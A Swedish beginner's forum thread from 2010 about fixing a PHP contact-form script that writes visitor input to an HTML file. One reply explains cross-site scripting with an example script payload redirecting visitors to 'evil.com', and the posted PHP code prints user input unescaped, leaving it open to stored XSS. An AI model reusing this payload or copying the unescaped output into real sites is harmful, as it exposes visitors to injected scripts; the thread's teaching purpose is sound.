Re: hur fixa fel i formulär script?

[ JavaScript.nu's Forum ] [ Viktigt om forumet ] [ JavaScript.nu's Startsida ]

Forum / hur fixa fel i formulär script?

okej..sant...det är verkligen varmt...men bara i den del som jag bor på(i)

jag bor på .... utanför stockholm..

hur som helst

här här coden för den fixade info.php

<?php

if(!empty($_POST['namn']))

if(!empty($_POST['message']))

if(!empty($_POST['webside']))

if(!empty($_POST['date']))

if(!empty($_POST['addres']))

if(!empty($_POST['email']))

{

$fil = fopen("data.html", "a");

$namn = $_POST['namn'] . ";";

$message = $_POST['message'];

$webside = $_POST['webside'] . ";";
$date = $_POST['date'] . ";";

$addres = $_POST['addres'] . ";";

$email = $_POST['email'] . ";";
fwrite($fil, "<center>\n");

$lDate = date('F j, Y, g:i a');
fwrite($fil, "Date: $lDate\n");

fwrite($fil, "Message: $message \n");

fwrite($fil, "webside: $webside \n");

fwrite($fil, "date: $date \n");
fwrite($fil, "din addres: $addres \n");
fwrite($fil, "din mail addres: $email \n");
fwrite($fil, "</center>\n");

fclose($fil);

}

echo "<TABLE BORDER=0>
<TR>
<TD BACKGROUND=../images/images/untitled-1.gif>
<TABLE BORDER=0>
<TR>
<TD BACKGROUND=../rund-images.gif>";
echo "<center>";
echo "$message<br><br>";
echo "inskickat av $namn";
echo "webside: $webside";
echo "date: $date";
echo "din addres: $addres";
echo "din mail addres: $email";
echo "</center>";
echo "</TD></TR></TABLE></TD></TR></TABLE>";
?>
klick <A HREF="contakt.html">here</A> for contakt.html

är det här jag borde läga till php coden för HTML Special Characters?

>>>>>>>>>>>>>>>>>>>>>>
echo "<TABLE BORDER=0>
<TR>
<TD BACKGROUND=../images/images/untitled-1.gif>

exempel coden hitade jag på en hemsida på nätet

<?php
$convert = htmlspecialchars("<a href='http://www.mysite.com'>Links</a>");
echo $convert;
?>

när jag testade den coden så visades bara html coden inget annat...

så coden borde vara så här: $convert = htmlspecialchars("<TABLE BORDER=0>
<TR>
<TD BACKGROUND=../images/images/untitled-1.gif>");
echo $convert;

var läger man den då om jag få fråga?...
i coden..

föresten vad är IMO?

formlär coden är för lång att scriva ut här...

du har säkert laddat hem original coden som du har säkert mixtrat med?...kan du visa mej resuldatet?...

jag har föresten fyld år den 9 onde juli
då blev jag 34 år hurra för mej..:-D

jo just det ja..nu har jag helt nästan klömd bord din fråga...

broblemet efter jag fixade till contakt.html

och info.php var att resuldatet inte blev som jag hade tänkt...

texten blev för stor i contakt.html formälet för att jag raterade några saker...och resuldatet i data.html blev detta...

<center>
Date: July 19, 2010, 2:46 pm
Message: hejsan nu testar jag att skriva i den fixade formlär scripted
webside: addresen för hemsidan ; # sök min hemsida på google.se - petersfunderingar
tretje raden på resoltadet...där kan du skriva
i min gästbok..
date: här kom där jag bode addresen iställer för datumet det ska det inte göra;
din addres: no info;
din mail addres: mail @ din addres.se;
</center>

tack för mej..hoppas du förstod

ufomannen76

Ugh, sommarvärme är jobbigt. (Men sommarlov är iallafall skönt.)
Jag förstår inte helt; finns det några problem kvar som du inte har lyckats fixa? Om så skulle det vara bra om du beskrev dem och postade den senaste koden du använder.
Det jag menar med XSS är att användare kan skriva HTML/JavaScript-kod som sedan körs för andra användare. Tex skulle en illasinnad användare kunna, genom ett namn i stil med <script>location.href='http://evil.com/';</script> få andra användare att ladda hem virus. Se också Wikipedia: http://en.wikipedia.org/wiki/Cross-site_scripting. Något onödigt att tänka på för en personlig websida möjligen, men det är bra att vara varsam och lägga sig till med vanor som tex att alltid köra 'htmlspecialchars()' över text som skrivs ut och som kommer från användaren.

hejsan...har du det bra i sommar värmen?...det har jag iaf..:-)
jag hade bråtom när jag skrev det dära medelandet
så jag han inte förklara närmare...scripet var formlär som lignade en gästbok
och nu har jag ersatt det med en gästbok på min sida
somsakt jag har försökt fixa det problemet nu..
gemon att ändra i contakt.html och info.php filerna..
men jag fattar inte rigtigt vad du menar med det sista du skrev?...
- Du escapar inte HTML i indatat, vilket gör dig mottaglig för XSS.
förklara närmare är du snäll?...
//ufomannen76

Det enda egentliga felet jag ser är att din formulärssida inte innehåller något element med namn "text" (däremot innehåller den massor av fält med namn som element_2_1 som inte används).
Du har däremot en del ytterligare missar:
- Du kollar bara existensen av $_POST['namn'], inte av resten.
- $_POST['text'] används flera gånger.
- Om de inte existerar skrivs de fortfarande ut, vilket bör ge en del PHP-varningar. (Du avslutar if-satsen för tidigt.)
- Du escapar inte HTML i indatat, vilket gör dig mottaglig för XSS.
(Ursäkta sent svar - skyll på IMO: http://www.imo2010org.kz/)

hejsan alla forum skrivare på javascript.nu
jag undrar en sak..
jag har ett problem i ett php script
som inte fungar som det ska...
hur fixar jag det?...
här filerna som innehåller scripten
contakt.html = själva contakt formläret
info.php = scripted som sparar till data.html
data.html = inehåller den text som sparas från info.php
här är coden för info.php
<?
if(!empty($_POST['namn']))
{
$fil = fopen("data.html", "a");
$namn = $_POST['namn'] . ";";
$message = $_POST['message'];
$webside = $_POST['text'] . ";";
$date = $_POST['text'] . ";";
$addres = $_POST['text'] . ";";
$email = $_POST['text'] . ";";
fwrite($fil, "<center>\n");
$lDate = date('F j, Y, g:i a');
fwrite($fil, "Date: $lDate\n");
fwrite($fil, "Message: $message \n");
fwrite($fil, "webside: $webside \n");
fwrite($fil, "date: $date \n");
fwrite($fil, "din addres: $addres \n");
fwrite($fil, "din mail addres: $email \n");
fwrite($fil, "</center>\n");
fclose($fil);
}
echo "<TABLE BORDER=0>
<TR>
<TD BACKGROUND=../images/images/untitled-1.gif>
<TABLE BORDER=0>
<TR>
<TD BACKGROUND=../rund-images.gif>";
echo "<center>";
echo "$message

";
echo "inskickat av $namn";
echo "webside: $webside";
echo "date: $date";
echo "din addres: $addres";
echo "din mail addres: $email";
echo "</center>";
echo "</TD></TR></TABLE></TD></TR></TABLE>";
?>
klick <A HREF="contakt.html">here</A> for contakt.html
och här kan ni ladda ner alla filerna i en zip fil
http://www.megaupload.com/?d=TLLDCFKU
//tack för mej den här gången skriver jag inte ut mitt namn...
//och mitt e-post addres .. jag skriver bara ut mitt nick istället
//(på tanke på erfarenhet från för när jag skrev ut dom..
//jag fick bara massa spam i min mail)
//ufomannen76

Postat av ufomannen76 (84.217.113.102) den 21 Juli, 2010 kl 21:53:35.
Som svar på: Re: hur fixa fel i formulär script? postat av Simon den 21 Juli, 2010 kl 14:47:42.

Svar på inlägget:

Re: hur fixa fel i formulär script? Simon 18:28:10 07/22/10 (1)
- Re: hur fixa fel i formulär script? ufomannen76 22:19:23 07/24/10 (0)

Posta ett svar:

Namn:

E-Mail:

Rubrik:

Meddelande:

<citat> okej..sant...det är verkligen varmt...men bara i den del som jag bor på(i) jag bor på .... utanför stockholm.. hur som helst här här coden för den fixade info.php <?php if(!empty($_POST['namn'])) if(!empty($_POST['message'])) if(!empty($_POST['webside'])) if(!empty($_POST['date'])) if(!empty($_POST['addres'])) if(!empty($_POST['email'])) { $fil = fopen("data.html", "a"); $namn = $_POST['namn'] . ";"; $message = $_POST['message']; $webside = $_POST['webside'] . ";"; $date = $_POST['date'] . ";"; $addres = $_POST['addres'] . ";"; $email = $_POST['email'] . ";"; fwrite($fil, "<center>\n"); $lDate = date('F j, Y, g:i a'); fwrite($fil, "Date: $lDate\n"); fwrite($fil, "Message: $message \n"); fwrite($fil, "webside: $webside \n"); fwrite($fil, "date: $date \n"); fwrite($fil, "din addres: $addres \n"); fwrite($fil, "din mail addres: $email \n"); fwrite($fil, "</center>\n"); fclose($fil); } echo "<TABLE BORDER=0> <TR> <TD BACKGROUND=../images/images/untitled-1.gif> <TABLE BORDER=0> <TR> <TD BACKGROUND=../rund-images.gif>"; echo "<center>"; echo "$message "; echo "inskickat av $namn"; echo "webside: $webside"; echo "date: $date"; echo "din addres: $addres"; echo "din mail addres: $email"; echo "</center>"; echo "</TD></TR></TABLE></TD></TR></TABLE>"; ?> klick <A HREF="contakt.html">here</A> for contakt.html är det här jag borde läga till php coden för HTML Special Characters? >>>>>>>>>>>>>>>>>>>>>> echo "<TABLE BORDER=0> <TR> <TD BACKGROUND=../images/images/untitled-1.gif> exempel coden hitade jag på en hemsida på nätet <?php $convert = htmlspecialchars("<a href='http://www.mysite.com'>Links</a>"); echo $convert; ?> när jag testade den coden så visades bara html coden inget annat... så coden borde vara så här: $convert = htmlspecialchars("<TABLE BORDER=0> <TR> <TD BACKGROUND=../images/images/untitled-1.gif>"); echo $convert; var läger man den då om jag få fråga?... i coden.. föresten vad är IMO? formlär coden är för lång att scriva ut här... du har säkert laddat hem original coden som du har säkert mixtrat med?...kan du visa mej resuldatet?... jag har föresten fyld år den 9 onde juli då blev jag 34 år hurra för mej..:-D jo just det ja..nu har jag helt nästan klömd bord din fråga... broblemet efter jag fixade till contakt.html och info.php var att resuldatet inte blev som jag hade tänkt... texten blev för stor i contakt.html formälet för att jag raterade några saker...och resuldatet i data.html blev detta... <center> Date: July 19, 2010, 2:46 pm Message: hejsan nu testar jag att skriva i den fixade formlär scripted webside: addresen för hemsidan ; # sök min hemsida på google.se - petersfunderingar tretje raden på resoltadet...där kan du skriva i min gästbok.. date: här kom där jag bode addresen iställer för datumet det ska det inte göra; din addres: no info; din mail addres: mail @ din addres.se; </center> tack för mej..hoppas du förstod ufomannen76 <citat> Ugh, sommarvärme är jobbigt. (Men sommarlov är iallafall skönt.) Jag förstår inte helt; finns det några problem kvar som du inte har lyckats fixa? Om så skulle det vara bra om du beskrev dem och postade den senaste koden du använder. Det jag menar med XSS är att användare kan skriva HTML/JavaScript-kod som sedan körs för andra användare. Tex skulle en illasinnad användare kunna, genom ett namn i stil med <script>location.href='http://evil.com/';</script> få andra användare att ladda hem virus. Se också Wikipedia: <url>http://en.wikipedia.org/wiki/Cross-site_scripting</url>. Något onödigt att tänka på för en personlig websida möjligen, men det är bra att vara varsam och lägga sig till med vanor som tex att alltid köra 'htmlspecialchars()' över text som skrivs ut och som kommer från användaren. <citat> hejsan...har du det bra i sommar värmen?...det har jag iaf..:-) jag hade bråtom när jag skrev det dära medelandet så jag han inte förklara närmare...scripet var formlär som lignade en gästbok och nu har jag ersatt det med en gästbok på min sida somsakt jag har försökt fixa det problemet nu.. gemon att ändra i contakt.html och info.php filerna.. men jag fattar inte rigtigt vad du menar med det sista du skrev?... - Du escapar inte HTML i indatat, vilket gör dig mottaglig för XSS. förklara närmare är du snäll?... //ufomannen76 <citat> Det enda egentliga felet jag ser är att din formulärssida inte innehåller något element med namn "text" (däremot innehåller den massor av fält med namn som element_2_1 som inte används). Du har däremot en del ytterligare missar: - Du kollar bara existensen av $_POST['namn'], inte av resten. - $_POST['text'] används flera gånger. - Om de inte existerar skrivs de fortfarande ut, vilket bör ge en del PHP-varningar. (Du avslutar if-satsen för tidigt.) - Du escapar inte HTML i indatat, vilket gör dig mottaglig för XSS. (Ursäkta sent svar - skyll på IMO: <url>http://www.imo2010org.kz/</url>) <citat> hejsan alla forum skrivare på javascript.nu jag undrar en sak.. jag har ett problem i ett php script som inte fungar som det ska... hur fixar jag det?... här filerna som innehåller scripten contakt.html = själva contakt formläret info.php = scripted som sparar till data.html data.html = inehåller den text som sparas från info.php här är coden för info.php <? if(!empty($_POST['namn'])) { $fil = fopen("data.html", "a"); $namn = $_POST['namn'] . ";"; $message = $_POST['message']; $webside = $_POST['text'] . ";"; $date = $_POST['text'] . ";"; $addres = $_POST['text'] . ";"; $email = $_POST['text'] . ";"; fwrite($fil, "<center>\n"); $lDate = date('F j, Y, g:i a'); fwrite($fil, "Date: $lDate\n"); fwrite($fil, "Message: $message \n"); fwrite($fil, "webside: $webside \n"); fwrite($fil, "date: $date \n"); fwrite($fil, "din addres: $addres \n"); fwrite($fil, "din mail addres: $email \n"); fwrite($fil, "</center>\n"); fclose($fil); } echo "<TABLE BORDER=0> <TR> <TD BACKGROUND=../images/images/untitled-1.gif> <TABLE BORDER=0> <TR> <TD BACKGROUND=../rund-images.gif>"; echo "<center>"; echo "$message "; echo "inskickat av $namn"; echo "webside: $webside"; echo "date: $date"; echo "din addres: $addres"; echo "din mail addres: $email"; echo "</center>"; echo "</TD></TR></TABLE></TD></TR></TABLE>"; ?> klick <A HREF="contakt.html">here</A> for contakt.html och här kan ni ladda ner alla filerna i en zip fil http://www.megaupload.com/?d=TLLDCFKU //tack för mej den här gången skriver jag inte ut mitt namn... //och mitt e-post addres .. jag skriver bara ut mitt nick istället //(på tanke på erfarenhet från för när jag skrev ut dom.. //jag fick bara massa spam i min mail) //ufomannen76 </citat> </citat> </citat> </citat> </citat>

Ja tack, maila mig om andra svarar på detta inlägg.

Ja tack, maila mig om andra svarar på mitt inlägg.

[ JavaScript.nu's Forum ] [ Viktigt om forumet ] [ JavaScript.nu's Startsida ]